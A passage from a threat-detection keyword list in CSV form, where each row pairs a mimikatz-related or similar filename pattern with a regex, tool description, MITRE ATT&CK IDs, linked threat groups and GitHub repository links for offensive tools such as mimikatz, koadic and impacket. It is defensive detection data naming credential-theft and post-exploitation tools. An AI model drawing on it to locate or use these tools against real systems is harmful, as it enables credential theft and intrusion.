Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52006" "*mimidrv*",".{0,1000}mimidrv.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered 
Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52007" "*mimidrv.pdb*",".{0,1000}mimidrv\.pdb.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52008" "*mimidrv.sys*",".{0,1000}mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - 
T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52009" "*mimidrv.sys*",".{0,1000}mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52010" "*mimidrv.sys*",".{0,1000}mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52011" "*mimidrv.zip*",".{0,1000}mimidrv\.zip.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52012" "*mimikatz 2.2.0 x64*",".{0,1000}mimikatz\s2\.2\.0\sx64.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm 
Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52013" "*mimikatz -Command *",".{0,1000}mimikatz\s\-Command\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","52014" "*mimikatz for Windows*",".{0,1000}mimikatz\sfor\sWindows.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52015" "*Mimikatz*",".{0,1000}Mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets.","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52016" "*Mimikatz.cs*",".{0,1000}Mimikatz\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","52017" "*mimikatz.dll*",".{0,1000}mimikatz\.dll.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","52018" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","52019" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52020" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","52021" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52022" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","52023" "*mimikatz.log*",".{0,1000}mimikatz\.log.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","52024" "*mimikatz.log*",".{0,1000}mimikatz\.log.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","N/A","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","52025" "*mimikatz.py*",".{0,1000}mimikatz\.py.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - 
TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","1","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","52026" "*mimikatz.py*",".{0,1000}mimikatz\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","52027" "*mimikatz.raw*",".{0,1000}mimikatz\.raw.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","52028" "*mimikatz_cred_collector.py*",".{0,1000}mimikatz_cred_collector\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","52030" 
"*mimikatz_dotnet2js*",".{0,1000}mimikatz_dotnet2js.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","52031" "*mimikatz_dynwrapx*",".{0,1000}mimikatz_dynwrapx.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","52032" "*mimikatz_tashlib*",".{0,1000}mimikatz_tashlib.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","52033" "*mimikatz_trunk*",".{0,1000}mimikatz_trunk.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52034" "*mimikatz_trunk.7z*",".{0,1000}mimikatz_trunk\.7z.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archive names","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig 
- PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52035" "*mimikatz_trunk.zip*",".{0,1000}mimikatz_trunk\.zip.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archive names","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - 